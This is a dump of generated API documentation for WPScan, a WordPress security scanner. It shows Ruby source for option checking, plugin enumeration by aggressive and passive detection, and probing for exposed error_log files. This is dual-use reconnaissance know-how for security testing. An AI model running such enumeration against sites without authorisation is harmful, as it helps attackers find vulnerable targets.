<p class="link"><a href="Object.html">Object</a></p>
</div>
<!-- Method Quickref -->
<div id="method-list-section" class="section">
<h3 class="section-header">Methods</h3>
<ul class="link-list">
<li><a href="#method-c-check_options">::check_options</a></li>
</ul>
</div>
</div>
<div id="project-metadata">
<div id="fileindex-section" class="section project-section">
<h3 class="section-header">Files</h3>
<ul>
<li class="file"><a href="./CREDITS.html">CREDITS</a></li>
<li class="file"><a href="./Gemfile.html">Gemfile</a></li>
<li class="file"><a href="./README.html">README</a></li>
</ul>
</div>
<div id="classindex-section" class="section project-section">
<h3 class="section-header">Class/Module Index
<span class="search-toggle"><img src="./images/find.png"
height="16" width="16" alt="[+]"
title="show/hide quicksearch" /></span></h3>
<form action="#" method="get" accept-charset="utf-8" class="initially-hidden">
<fieldset>
<legend>Quicksearch</legend>
<input type="text" name="quicksearch" value=""
class="quicksearch-field" />
</fieldset>
</form>
<ul class="link-list">
<li><a href="./Array.html">Array</a></li>
<li><a href="./Browser.html">Browser</a></li>
<li><a href="./BruteForce.html">BruteForce</a></li>
<li><a href="./CacheFileStore.html">CacheFileStore</a></li>
<li><a href="./Exploit.html">Exploit</a></li>
<li><a href="./Generate_List.html">Generate_List</a></li>
<li><a href="./GitUpdater.html">GitUpdater</a></li>
<li><a href="./Malwares.html">Malwares</a></li>
<li><a href="./Object.html">Object</a></li>
<li><a href="./RpcClient.html">RpcClient</a></li>
<li><a href="./SvnUpdater.html">SvnUpdater</a></li>
<li><a href="./Svn_Parser.html">Svn_Parser</a></li>
<li><a href="./Updater.html">Updater</a></li>
<li><a href="./UpdaterFactory.html">UpdaterFactory</a></li>
<li><a href="./Vulnerable.html">Vulnerable</a></li>
<li><a href="./WebSite.html">WebSite</a></li>
<li><a href="./WpConfigBackup.html">WpConfigBackup</a></li>
<li><a href="./WpDetector.html">WpDetector</a></li>
<li><a href="./WpEnumerator.html">WpEnumerator</a></li>
<li><a href="./WpFullPathDisclosure.html">WpFullPathDisclosure</a></li>
<li><a href="./WpItem.html">WpItem</a></li>
<li><a href="./WpLoginProtection.html">WpLoginProtection</a></li>
<li><a href="./WpOptions.html">WpOptions</a></li>
<li><a href="./WpPlugin.html">WpPlugin</a></li>
<li><a href="./WpPlugins.html">WpPlugins</a></li>
<li><a href="./WpReadme.html">WpReadme</a></li>
<li><a href="./WpTarget.html">WpTarget</a></li>
<li><a href="./WpTheme.html">WpTheme</a></li>
<li><a href="./WpThemes.html">WpThemes</a></li>
<li><a href="./WpTimthumbs.html">WpTimthumbs</a></li>
<li><a href="./WpUser.html">WpUser</a></li>
<li><a href="./WpUsernames.html">WpUsernames</a></li>
<li><a href="./WpVersion.html">WpVersion</a></li>
<li><a href="./WpVulnerability.html">WpVulnerability</a></li>
<li><a href="./WpscanOptions.html">WpscanOptions</a></li>
</ul>
<div id="no-class-search-results" style="display: none;">No matching classes.</div>
</div>
</div>
</div>
<div id="documentation">
<h1 class="class">WpOptions</h1>
<div id="description" class="description">
<p>Options Hash</p>
<h4>Options</h4>
<ul><li>
<p><tt>url</tt> - The base URL of the WordPress site</p>
</li><li>
<p><tt>only_vulnerable_ones</tt> - Only detect vulnerable items</p>
</li><li>
<p><tt>file</tt> - Filename with items to detect</p>
</li><li>
<p><tt>vulns_file</tt> - XML file with vulnerabilities</p>
</li><li>
<p><tt>vulns_xpath</tt> - XPath for vulnerability XML file</p>
</li><li>
<p><tt>vulns_xpath_2</tt> - XPath for vulnerability XML file</p>
</li><li>
<p><tt>wp_content_dir</tt> - Name of the wp-content directory</p>
</li><li>
<p><tt>show_progress_bar</tt> - Show a progress bar during enumeration</p>
</li><li>
<p><tt>error_404_hash</tt> - MD5 hash of a 404 page</p>
</li><li>
<p><tt>type</tt> - Type: plugins, themes</p>
</li></ul>
</div><!-- description -->
<div id="5Buntitled-5D" class="documentation-section">
<!-- Methods -->
<div id="public-class-method-details" class="method-section section">
<h3 class="section-header">Public Class Methods</h3>
<div id="check_options-method" class="method-detail ">
<a name="method-c-check_options"></a>
<div class="method-heading">
<span class="method-name">check_options</span><span
class="method-args">(options)</span>
<span class="method-click-advice">click to toggle source</span>
</div>
<div class="method-description">
<div class="method-source-code" id="check_options-source">
<pre>
<span class="ruby-comment"># File lib/wpscan/wp_options.rb, line 34</span>
<span class="ruby-keyword">def</span> <span class="ruby-keyword">self</span>.<span class="ruby-identifier">check_options</span>(<span class="ruby-identifier">options</span>)
<span class="ruby-identifier">raise</span>(<span class="ruby-string">&quot;base_url must be set&quot;</span>) <span class="ruby-keyword">unless</span> <span class="ruby-identifier">options</span>[<span class="ruby-value">:base_url</span>] <span class="ruby-operator">!=</span> <span class="ruby-keyword">nil</span> <span class="ruby-keyword">and</span> <span class="ruby-identifier">options</span>[<span class="ruby-value">:base_url</span>].<span class="ruby-identifier">to_s</span>.<span class="ruby-identifier">length</span> <span class="ruby-operator">&gt;</span> <span class="ruby-value">0</span>
<span class="ruby-identifier">raise</span>(<span class="ruby-string">&quot;only_vulnerable_ones must be set&quot;</span>) <span class="ruby-keyword">unless</span> <span class="ruby-identifier">options</span>[<span class="ruby-value">:only_vulnerable_ones</span>] <span class="ruby-operator">!=</span> <span class="ruby-keyword">nil</span>
<span class="ruby-identifier">raise</span>(<span class="ruby-string">&quot;file must be set&quot;</span>) <span class="ruby-keyword">unless</span> <span class="ruby-identifier">options</span>[<span class="ruby-value">:file</span>] <span class="ruby-operator">!=</span> <span class="ruby-keyword">nil</span> <span class="ruby-keyword">and</span> <span class="ruby-identifier">options</span>[<span class="ruby-value">:file</span>].<span class="ruby-identifier">length</span> <span class="ruby-operator">&gt;</span> <span class="ruby-value">0</span>
<span class="ruby-identifier">raise</span>(<span class="ruby-string">&quot;vulns_file must be set&quot;</span>) <span class="ruby-keyword">unless</span> <span class="ruby-identifier">options</span>[<span class="ruby-value">:vulns_file</span>] <span class="ruby-operator">!=</span> <span class="ruby-keyword">nil</span> <span class="ruby-keyword">and</span> <span class="ruby-identifier">options</span>[<span class="ruby-value">:vulns_file</span>].<span class="ruby-identifier">length</span> <span class="ruby-operator">&gt;</span> <span class="ruby-value">0</span>
<span class="ruby-identifier">raise</span>(<span class="ruby-string">&quot;vulns_xpath must be set&quot;</span>) <span class="ruby-keyword">unless</span> <span class="ruby-identifier">options</span>[<span class="ruby-value">:vulns_xpath</span>] <span class="ruby-operator">!=</span> <span class="ruby-keyword">nil</span> <span class="ruby-keyword">and</span> <span class="ruby-identifier">options</span>[<span class="ruby-value">:vulns_xpath</span>].<span class="ruby-identifier">length</span> <span class="ruby-operator">&gt;</span> <span class="ruby-value">0</span>
<span class="ruby-identifier">raise</span>(<span class="ruby-string">&quot;vulns_xpath_2 must be set&quot;</span>) <span class="ruby-keyword">unless</span> <span class="ruby-identifier">options</span>[<span class="ruby-value">:vulns_xpath_2</span>] <span class="ruby-operator">!=</span> <span class="ruby-keyword">nil</span> <span class="ruby-keyword">and</span> <span class="ruby-identifier">options</span>[<span class="ruby-value">:vulns_xpath_2</span>].<span class="ruby-identifier">length</span> <span class="ruby-operator">&gt;</span> <span class="ruby-value">0</span>
<span class="ruby-identifier">raise</span>(<span class="ruby-string">&quot;wp_content_dir must be set&quot;</span>) <span class="ruby-keyword">unless</span> <span class="ruby-identifier">options</span>[<span class="ruby-value">:wp_content_dir</span>] <span class="ruby-operator">!=</span> <span class="ruby-keyword">nil</span> <span class="ruby-keyword">and</span> <span class="ruby-identifier">options</span>[<span class="ruby-value">:wp_content_dir</span>].<span class="ruby-identifier">length</span> <span class="ruby-operator">&gt;</span> <span class="ruby-value">0</span>
<span class="ruby-identifier">raise</span>(<span class="ruby-string">&quot;show_progress_bar must be set&quot;</span>) <span class="ruby-keyword">unless</span> <span class="ruby-identifier">options</span>[<span class="ruby-value">:show_progress_bar</span>] <span class="ruby-operator">!=</span> <span class="ruby-keyword">nil</span>
<span class="ruby-identifier">raise</span>(<span class="ruby-string">&quot;error_404_hash must be set&quot;</span>) <span class="ruby-keyword">unless</span> <span class="ruby-identifier">options</span>[<span class="ruby-value">:error_404_hash</span>] <span class="ruby-operator">!=</span> <span class="ruby-keyword">nil</span> <span class="ruby-keyword">and</span> <span class="ruby-identifier">options</span>[<span class="ruby-value">:error_404_hash</span>].<span class="ruby-identifier">length</span> <span class="ruby-operator">&gt;</span> <span class="ruby-value">0</span>
<span class="ruby-identifier">raise</span>(<span class="ruby-string">&quot;type must be set&quot;</span>) <span class="ruby-keyword">unless</span> <span class="ruby-identifier">options</span>[<span class="ruby-value">:type</span>] <span class="ruby-operator">!=</span> <span class="ruby-keyword">nil</span> <span class="ruby-keyword">and</span> <span class="ruby-identifier">options</span>[<span class="ruby-value">:type</span>].<span class="ruby-identifier">length</span> <span class="ruby-operator">&gt;</span> <span class="ruby-value">0</span>
<span class="ruby-keyword">unless</span> <span class="ruby-identifier">options</span>[<span class="ruby-value">:type</span>] <span class="ruby-operator">=~</span> <span class="ruby-regexp">/plugins/</span> <span class="ruby-keyword">or</span> <span class="ruby-identifier">options</span>[<span class="ruby-value">:type</span>] <span class="ruby-operator">=~</span> <span class="ruby-regexp">/themes/</span> <span class="ruby-keyword">or</span> <span class="ruby-identifier">options</span>[<span class="ruby-value">:type</span>] <span class="ruby-operator">=~</span> <span class="ruby-regexp">/timthumbs/</span>
<span class="ruby-identifier">raise</span>(<span class="ruby-node">&quot;Unknown type #{options[:type]}&quot;</span>)
<span class="ruby-keyword">end</span>
<span class="ruby-keyword">end</span></pre>
</div><!-- check_options-source -->
</div>
</div><!-- check_options-method -->
</div><!-- public-class-method-details -->
</div><!-- 5Buntitled-5D -->
</div><!-- documentation -->
<div id="validator-badges">
<p><small><a href="http://validator.w3.org/check/referer">[Validate]</a></small></p>
<p><small>Generated with the <a href="http://deveiate.org/projects/Darkfish-Rdoc/">Darkfish
Rdoc Generator</a> 2</small>.</p>
</div>
</body>
</html>

345
doc/WpPlugin.html Normal file
View File

@@ -0,0 +1,345 @@
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta content="text/html; charset=UTF-8" http-equiv="Content-Type" />
<title>Class: WpPlugin</title>
<link rel="stylesheet" href="./rdoc.css" type="text/css" media="screen" />
<script src="./js/jquery.js" type="text/javascript" charset="utf-8"></script>
<script src="./js/thickbox-compressed.js" type="text/javascript" charset="utf-8"></script>
<script src="./js/quicksearch.js" type="text/javascript" charset="utf-8"></script>
<script src="./js/darkfish.js" type="text/javascript" charset="utf-8"></script>
</head>
<body id="top" class="class">
<div id="metadata">
<div id="home-metadata">
<div id="home-section" class="section">
<h3 class="section-header">
<a href="./index.html">Home</a>
<a href="./index.html#classes">Classes</a>
<a href="./index.html#methods">Methods</a>
</h3>
</div>
</div>
<div id="file-metadata">
<div id="file-list-section" class="section">
<h3 class="section-header">In Files</h3>
<div class="section-body">
<ul>
<li><a href="./lib/wpscan/wp_plugin_rb.html?TB_iframe=true&amp;height=550&amp;width=785"
class="thickbox" title="lib/wpscan/wp_plugin.rb">lib/wpscan/wp_plugin.rb</a></li>
</ul>
</div>
</div>
</div>
<div id="class-metadata">
<!-- Parent Class -->
<div id="parent-class-section" class="section">
<h3 class="section-header">Parent</h3>
<p class="link"><a href="WpItem.html">WpItem</a></p>
</div>
<!-- Method Quickref -->
<div id="method-list-section" class="section">
<h3 class="section-header">Methods</h3>
<ul class="link-list">
<li><a href="#method-c-new">::new</a></li>
<li><a href="#method-i-error_log-3F">#error_log?</a></li>
<li><a href="#method-i-error_log_url">#error_log_url</a></li>
</ul>
</div>
</div>
<div id="project-metadata">
<div id="fileindex-section" class="section project-section">
<h3 class="section-header">Files</h3>
<ul>
<li class="file"><a href="./CREDITS.html">CREDITS</a></li>
<li class="file"><a href="./Gemfile.html">Gemfile</a></li>
<li class="file"><a href="./README.html">README</a></li>
</ul>
</div>
<div id="classindex-section" class="section project-section">
<h3 class="section-header">Class/Module Index
<span class="search-toggle"><img src="./images/find.png"
height="16" width="16" alt="[+]"
title="show/hide quicksearch" /></span></h3>
<form action="#" method="get" accept-charset="utf-8" class="initially-hidden">
<fieldset>
<legend>Quicksearch</legend>
<input type="text" name="quicksearch" value=""
class="quicksearch-field" />
</fieldset>
</form>
<ul class="link-list">
<li><a href="./Array.html">Array</a></li>
<li><a href="./Browser.html">Browser</a></li>
<li><a href="./BruteForce.html">BruteForce</a></li>
<li><a href="./CacheFileStore.html">CacheFileStore</a></li>
<li><a href="./Exploit.html">Exploit</a></li>
<li><a href="./Generate_List.html">Generate_List</a></li>
<li><a href="./GitUpdater.html">GitUpdater</a></li>
<li><a href="./Malwares.html">Malwares</a></li>
<li><a href="./Object.html">Object</a></li>
<li><a href="./RpcClient.html">RpcClient</a></li>
<li><a href="./SvnUpdater.html">SvnUpdater</a></li>
<li><a href="./Svn_Parser.html">Svn_Parser</a></li>
<li><a href="./Updater.html">Updater</a></li>
<li><a href="./UpdaterFactory.html">UpdaterFactory</a></li>
<li><a href="./Vulnerable.html">Vulnerable</a></li>
<li><a href="./WebSite.html">WebSite</a></li>
<li><a href="./WpConfigBackup.html">WpConfigBackup</a></li>
<li><a href="./WpDetector.html">WpDetector</a></li>
<li><a href="./WpEnumerator.html">WpEnumerator</a></li>
<li><a href="./WpFullPathDisclosure.html">WpFullPathDisclosure</a></li>
<li><a href="./WpItem.html">WpItem</a></li>
<li><a href="./WpLoginProtection.html">WpLoginProtection</a></li>
<li><a href="./WpOptions.html">WpOptions</a></li>
<li><a href="./WpPlugin.html">WpPlugin</a></li>
<li><a href="./WpPlugins.html">WpPlugins</a></li>
<li><a href="./WpReadme.html">WpReadme</a></li>
<li><a href="./WpTarget.html">WpTarget</a></li>
<li><a href="./WpTheme.html">WpTheme</a></li>
<li><a href="./WpThemes.html">WpThemes</a></li>
<li><a href="./WpTimthumbs.html">WpTimthumbs</a></li>
<li><a href="./WpUser.html">WpUser</a></li>
<li><a href="./WpUsernames.html">WpUsernames</a></li>
<li><a href="./WpVersion.html">WpVersion</a></li>
<li><a href="./WpVulnerability.html">WpVulnerability</a></li>
<li><a href="./WpscanOptions.html">WpscanOptions</a></li>
</ul>
<div id="no-class-search-results" style="display: none;">No matching classes.</div>
</div>
</div>
</div>
<div id="documentation">
<h1 class="class">WpPlugin</h1>
<div id="description" class="description">
</div><!-- description -->
<div id="5Buntitled-5D" class="documentation-section">
<!-- Methods -->
<div id="public-class-method-details" class="method-section section">
<h3 class="section-header">Public Class Methods</h3>
<div id="new-method" class="method-detail ">
<a name="method-c-new"></a>
<div class="method-heading">
<span class="method-name">new</span><span
class="method-args">(options = {})</span>
<span class="method-click-advice">click to toggle source</span>
</div>
<div class="method-description">
<div class="method-source-code" id="new-source">
<pre>
<span class="ruby-comment"># File lib/wpscan/wp_plugin.rb, line 20</span>
<span class="ruby-keyword">def</span> <span class="ruby-identifier">initialize</span>(<span class="ruby-identifier">options</span> = {})
<span class="ruby-identifier">options</span>[<span class="ruby-value">:vulns_file</span>] = (<span class="ruby-identifier">options</span>[<span class="ruby-value">:vulns_file</span>] <span class="ruby-operator">!=</span> <span class="ruby-keyword">nil</span> <span class="ruby-keyword">and</span> <span class="ruby-identifier">options</span>[<span class="ruby-value">:vulns_file</span>] <span class="ruby-operator">!=</span> <span class="ruby-string">&quot;&quot;</span>) <span class="ruby-operator">?</span>
<span class="ruby-identifier">options</span>[<span class="ruby-value">:vulns_file</span>] <span class="ruby-operator">:</span> <span class="ruby-constant">DATA_DIR</span> <span class="ruby-operator">+</span> <span class="ruby-string">&quot;/plugin_vulns.xml&quot;</span>
<span class="ruby-identifier">options</span>[<span class="ruby-value">:vulns_xpath</span>] = <span class="ruby-string">&quot;//plugin[@name='$name$']/vulnerability&quot;</span>
<span class="ruby-identifier">options</span>[<span class="ruby-value">:vulns_xpath_2</span>] = <span class="ruby-string">&quot;//plugin&quot;</span>
<span class="ruby-identifier">options</span>[<span class="ruby-value">:type</span>] = <span class="ruby-string">&quot;plugins&quot;</span>
<span class="ruby-keyword">super</span>(<span class="ruby-identifier">options</span>)
<span class="ruby-keyword">end</span></pre>
</div><!-- new-source -->
</div>
</div><!-- new-method -->
</div><!-- public-class-method-details -->
<div id="public-instance-method-details" class="method-section section">
<h3 class="section-header">Public Instance Methods</h3>
<div id="error_log-3F-method" class="method-detail ">
<a name="method-i-error_log-3F"></a>
<div class="method-heading">
<span class="method-name">error_log?</span><span
class="method-args">()</span>
<span class="method-click-advice">click to toggle source</span>
</div>
<div class="method-description">
<p>Discover any error_log files created by WordPress These are created by the
WordPress error_log() function They are normally found in the /plugins/
directory, however can also be found in their specific plugin dir. <a
href="http://www.exploit-db.com/ghdb/3714/">www.exploit-db.com/ghdb/3714/</a></p>
<div class="method-source-code" id="error_log-3F-source">
<pre>
<span class="ruby-comment"># File lib/wpscan/wp_plugin.rb, line 34</span>
<span class="ruby-keyword">def</span> <span class="ruby-identifier">error_log?</span>
<span class="ruby-identifier">response_body</span> = <span class="ruby-constant">Browser</span>.<span class="ruby-identifier">instance</span>.<span class="ruby-identifier">get</span>(<span class="ruby-identifier">error_log_url</span>(), <span class="ruby-value">:headers</span> =<span class="ruby-operator">&gt;</span> {<span class="ruby-string">&quot;range&quot;</span> =<span class="ruby-operator">&gt;</span> <span class="ruby-string">&quot;bytes=0-700&quot;</span>}).<span class="ruby-identifier">body</span>
<span class="ruby-identifier">response_body</span>[<span class="ruby-regexp">%{PHP Fatal error}</span>] <span class="ruby-operator">?</span> <span class="ruby-keyword">true</span> <span class="ruby-operator">:</span> <span class="ruby-keyword">false</span>
<span class="ruby-keyword">end</span></pre>
</div><!-- error_log-3F-source -->
</div>
</div><!-- error_log-3F-method -->
<div id="error_log_url-method" class="method-detail ">
<a name="method-i-error_log_url"></a>
<div class="method-heading">
<span class="method-name">error_log_url</span><span
class="method-args">()</span>
<span class="method-click-advice">click to toggle source</span>
</div>
<div class="method-description">
<div class="method-source-code" id="error_log_url-source">
<pre>
<span class="ruby-comment"># File lib/wpscan/wp_plugin.rb, line 39</span>
<span class="ruby-keyword">def</span> <span class="ruby-identifier">error_log_url</span>
<span class="ruby-identifier">get_full_url</span>.<span class="ruby-identifier">merge</span>(<span class="ruby-string">&quot;error_log&quot;</span>).<span class="ruby-identifier">to_s</span>
<span class="ruby-keyword">end</span></pre>
</div><!-- error_log_url-source -->
</div>
</div><!-- error_log_url-method -->
</div><!-- public-instance-method-details -->
</div><!-- 5Buntitled-5D -->
</div><!-- documentation -->
<div id="validator-badges">
<p><small><a href="http://validator.w3.org/check/referer">[Validate]</a></small></p>
<p><small>Generated with the <a href="http://deveiate.org/projects/Darkfish-Rdoc/">Darkfish
Rdoc Generator</a> 2</small>.</p>
</div>
</body>
</html>

327
doc/WpPlugins.html Normal file
View File

@@ -0,0 +1,327 @@
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta content="text/html; charset=UTF-8" http-equiv="Content-Type" />
<title>Module: WpPlugins</title>
<link rel="stylesheet" href="./rdoc.css" type="text/css" media="screen" />
<script src="./js/jquery.js" type="text/javascript" charset="utf-8"></script>
<script src="./js/thickbox-compressed.js" type="text/javascript" charset="utf-8"></script>
<script src="./js/quicksearch.js" type="text/javascript" charset="utf-8"></script>
<script src="./js/darkfish.js" type="text/javascript" charset="utf-8"></script>
</head>
<body id="top" class="module">
<div id="metadata">
<div id="home-metadata">
<div id="home-section" class="section">
<h3 class="section-header">
<a href="./index.html">Home</a>
<a href="./index.html#classes">Classes</a>
<a href="./index.html#methods">Methods</a>
</h3>
</div>
</div>
<div id="file-metadata">
<div id="file-list-section" class="section">
<h3 class="section-header">In Files</h3>
<div class="section-body">
<ul>
<li><a href="./lib/wpscan/modules/wp_plugins_rb.html?TB_iframe=true&amp;height=550&amp;width=785"
class="thickbox" title="lib/wpscan/modules/wp_plugins.rb">lib/wpscan/modules/wp_plugins.rb</a></li>
</ul>
</div>
</div>
</div>
<div id="class-metadata">
<!-- Method Quickref -->
<div id="method-list-section" class="section">
<h3 class="section-header">Methods</h3>
<ul class="link-list">
<li><a href="#method-i-plugins_from_aggressive_detection">#plugins_from_aggressive_detection</a></li>
<li><a href="#method-i-plugins_from_passive_detection">#plugins_from_passive_detection</a></li>
</ul>
</div>
</div>
<div id="project-metadata">
<div id="fileindex-section" class="section project-section">
<h3 class="section-header">Files</h3>
<ul>
<li class="file"><a href="./CREDITS.html">CREDITS</a></li>
<li class="file"><a href="./Gemfile.html">Gemfile</a></li>
<li class="file"><a href="./README.html">README</a></li>
</ul>
</div>
<div id="classindex-section" class="section project-section">
<h3 class="section-header">Class/Module Index
<span class="search-toggle"><img src="./images/find.png"
height="16" width="16" alt="[+]"
title="show/hide quicksearch" /></span></h3>
<form action="#" method="get" accept-charset="utf-8" class="initially-hidden">
<fieldset>
<legend>Quicksearch</legend>
<input type="text" name="quicksearch" value=""
class="quicksearch-field" />
</fieldset>
</form>
<ul class="link-list">
<li><a href="./Array.html">Array</a></li>
<li><a href="./Browser.html">Browser</a></li>
<li><a href="./BruteForce.html">BruteForce</a></li>
<li><a href="./CacheFileStore.html">CacheFileStore</a></li>
<li><a href="./Exploit.html">Exploit</a></li>
<li><a href="./Generate_List.html">Generate_List</a></li>
<li><a href="./GitUpdater.html">GitUpdater</a></li>
<li><a href="./Malwares.html">Malwares</a></li>
<li><a href="./Object.html">Object</a></li>
<li><a href="./RpcClient.html">RpcClient</a></li>
<li><a href="./SvnUpdater.html">SvnUpdater</a></li>
<li><a href="./Svn_Parser.html">Svn_Parser</a></li>
<li><a href="./Updater.html">Updater</a></li>
<li><a href="./UpdaterFactory.html">UpdaterFactory</a></li>
<li><a href="./Vulnerable.html">Vulnerable</a></li>
<li><a href="./WebSite.html">WebSite</a></li>
<li><a href="./WpConfigBackup.html">WpConfigBackup</a></li>
<li><a href="./WpDetector.html">WpDetector</a></li>
<li><a href="./WpEnumerator.html">WpEnumerator</a></li>
<li><a href="./WpFullPathDisclosure.html">WpFullPathDisclosure</a></li>
<li><a href="./WpItem.html">WpItem</a></li>
<li><a href="./WpLoginProtection.html">WpLoginProtection</a></li>
<li><a href="./WpOptions.html">WpOptions</a></li>
<li><a href="./WpPlugin.html">WpPlugin</a></li>
<li><a href="./WpPlugins.html">WpPlugins</a></li>
<li><a href="./WpReadme.html">WpReadme</a></li>
<li><a href="./WpTarget.html">WpTarget</a></li>
<li><a href="./WpTheme.html">WpTheme</a></li>
<li><a href="./WpThemes.html">WpThemes</a></li>
<li><a href="./WpTimthumbs.html">WpTimthumbs</a></li>
<li><a href="./WpUser.html">WpUser</a></li>
<li><a href="./WpUsernames.html">WpUsernames</a></li>
<li><a href="./WpVersion.html">WpVersion</a></li>
<li><a href="./WpVulnerability.html">WpVulnerability</a></li>
<li><a href="./WpscanOptions.html">WpscanOptions</a></li>
</ul>
<div id="no-class-search-results" style="display: none;">No matching classes.</div>
</div>
</div>
</div>
<div id="documentation">
<h1 class="module">WpPlugins</h1>
<div id="description" class="description">
</div><!-- description -->
<div id="5Buntitled-5D" class="documentation-section">
<!-- Methods -->
<div id="public-instance-method-details" class="method-section section">
<h3 class="section-header">Public Instance Methods</h3>
<div id="plugins_from_aggressive_detection-method" class="method-detail ">
<a name="method-i-plugins_from_aggressive_detection"></a>
<div class="method-heading">
<span class="method-name">plugins_from_aggressive_detection</span><span
class="method-args">(options)</span>
<span class="method-click-advice">click to toggle source</span>
</div>
<div class="method-description">
<p>Enumerate installed plugins.</p>
<p>return array of <a href="WpPlugin.html">WpPlugin</a></p>
<div class="method-source-code" id="plugins_from_aggressive_detection-source">
<pre>
<span class="ruby-comment"># File lib/wpscan/modules/wp_plugins.rb, line 24</span>
<span class="ruby-keyword">def</span> <span class="ruby-identifier">plugins_from_aggressive_detection</span>(<span class="ruby-identifier">options</span>)
<span class="ruby-identifier">options</span>[<span class="ruby-value">:file</span>] = <span class="ruby-identifier">options</span>[<span class="ruby-value">:file</span>] <span class="ruby-operator">||</span> <span class="ruby-node">&quot;#{DATA_DIR}/plugins.txt&quot;</span>
<span class="ruby-identifier">options</span>[<span class="ruby-value">:vulns_file</span>] = <span class="ruby-identifier">options</span>[<span class="ruby-value">:vulns_file</span>] <span class="ruby-operator">||</span> <span class="ruby-node">&quot;#{DATA_DIR}/plugin_vulns.xml&quot;</span>
<span class="ruby-identifier">options</span>[<span class="ruby-value">:vulns_xpath</span>] = <span class="ruby-node">&quot;//plugin[@name='#{@name}']/vulnerability&quot;</span>
<span class="ruby-identifier">options</span>[<span class="ruby-value">:vulns_xpath_2</span>] = <span class="ruby-string">&quot;//plugin&quot;</span>
<span class="ruby-identifier">options</span>[<span class="ruby-value">:type</span>] = <span class="ruby-string">&quot;plugins&quot;</span>
<span class="ruby-identifier">result</span> = <span class="ruby-constant">WpDetector</span>.<span class="ruby-identifier">aggressive_detection</span>(<span class="ruby-identifier">options</span>)
<span class="ruby-identifier">plugins</span> = []
<span class="ruby-identifier">result</span>.<span class="ruby-identifier">each</span> <span class="ruby-keyword">do</span> <span class="ruby-operator">|</span><span class="ruby-identifier">r</span><span class="ruby-operator">|</span>
<span class="ruby-identifier">plugins</span> <span class="ruby-operator">&lt;&lt;</span> <span class="ruby-constant">WpPlugin</span>.<span class="ruby-identifier">new</span>(
<span class="ruby-value">:base_url</span> =<span class="ruby-operator">&gt;</span> <span class="ruby-identifier">r</span>.<span class="ruby-identifier">base_url</span>,
<span class="ruby-value">:path</span> =<span class="ruby-operator">&gt;</span> <span class="ruby-identifier">r</span>.<span class="ruby-identifier">path</span>,
<span class="ruby-value">:wp_content_dir</span> =<span class="ruby-operator">&gt;</span> <span class="ruby-identifier">r</span>.<span class="ruby-identifier">wp_content_dir</span>,
<span class="ruby-value">:name</span> =<span class="ruby-operator">&gt;</span> <span class="ruby-identifier">r</span>.<span class="ruby-identifier">name</span>,
<span class="ruby-value">:type</span> =<span class="ruby-operator">&gt;</span> <span class="ruby-string">&quot;plugins&quot;</span>,
<span class="ruby-value">:wp_plugins_dir</span> =<span class="ruby-operator">&gt;</span> <span class="ruby-identifier">r</span>.<span class="ruby-identifier">wp_plugins_dir</span>
)
<span class="ruby-keyword">end</span>
<span class="ruby-identifier">plugins</span>.<span class="ruby-identifier">sort_by</span> { <span class="ruby-operator">|</span><span class="ruby-identifier">p</span><span class="ruby-operator">|</span> <span class="ruby-identifier">p</span>.<span class="ruby-identifier">name</span> }
<span class="ruby-keyword">end</span></pre>
</div><!-- plugins_from_aggressive_detection-source -->
</div>
</div><!-- plugins_from_aggressive_detection-method -->
<div id="plugins_from_passive_detection-method" class="method-detail ">
<a name="method-i-plugins_from_passive_detection"></a>
<div class="method-heading">
<span class="method-name">plugins_from_passive_detection</span><span
class="method-args">(options)</span>
<span class="method-click-advice">click to toggle source</span>
</div>
<div class="method-description">
<p><a
href="http://code.google.com/p/wpscan/issues/detail?id=42">code.google.com/p/wpscan/issues/detail?id=42</a>
plugins can be found in the source code :</p>
<pre>&lt;script src='http://example.com/wp-content/plugins/s2member/...' /&gt;
&lt;link rel='stylesheet' href='http://example.com/wp-content/plugins/wp-minify/..' type='text/css' media='screen'/&gt;
...</pre>
<p>return array of <a href="WpPlugin.html">WpPlugin</a></p>
<div class="method-source-code" id="plugins_from_passive_detection-source">
<pre>
<span class="ruby-comment"># File lib/wpscan/modules/wp_plugins.rb, line 51</span>
<span class="ruby-keyword">def</span> <span class="ruby-identifier">plugins_from_passive_detection</span>(<span class="ruby-identifier">options</span>)
<span class="ruby-identifier">plugins</span> = []
<span class="ruby-identifier">temp</span> = <span class="ruby-constant">WpDetector</span>.<span class="ruby-identifier">passive_detection</span>(<span class="ruby-identifier">options</span>[<span class="ruby-value">:base_url</span>], <span class="ruby-string">&quot;plugins&quot;</span>, <span class="ruby-identifier">options</span>[<span class="ruby-value">:wp_content_dir</span>])
<span class="ruby-identifier">temp</span>.<span class="ruby-identifier">each</span> <span class="ruby-keyword">do</span> <span class="ruby-operator">|</span><span class="ruby-identifier">item</span><span class="ruby-operator">|</span>
<span class="ruby-identifier">plugins</span> <span class="ruby-operator">&lt;&lt;</span> <span class="ruby-constant">WpPlugin</span>.<span class="ruby-identifier">new</span>(
<span class="ruby-value">:base_url</span> =<span class="ruby-operator">&gt;</span> <span class="ruby-identifier">item</span>.<span class="ruby-identifier">base_url</span>,
<span class="ruby-value">:name</span> =<span class="ruby-operator">&gt;</span> <span class="ruby-identifier">item</span>.<span class="ruby-identifier">name</span>,
<span class="ruby-value">:path</span> =<span class="ruby-operator">&gt;</span> <span class="ruby-identifier">item</span>.<span class="ruby-identifier">path</span>,
<span class="ruby-value">:wp_content_dir</span> =<span class="ruby-operator">&gt;</span> <span class="ruby-identifier">options</span>[<span class="ruby-value">:wp_content_dir</span>],
<span class="ruby-value">:type</span> =<span class="ruby-operator">&gt;</span> <span class="ruby-string">&quot;plugins&quot;</span>,
<span class="ruby-value">:wp_plugins_dir</span> =<span class="ruby-operator">&gt;</span> <span class="ruby-identifier">options</span>[<span class="ruby-value">:wp_plugins_dir</span>]
)
<span class="ruby-keyword">end</span>
<span class="ruby-identifier">plugins</span>.<span class="ruby-identifier">sort_by</span> { <span class="ruby-operator">|</span><span class="ruby-identifier">p</span><span class="ruby-operator">|</span> <span class="ruby-identifier">p</span>.<span class="ruby-identifier">name</span> }
<span class="ruby-keyword">end</span></pre>
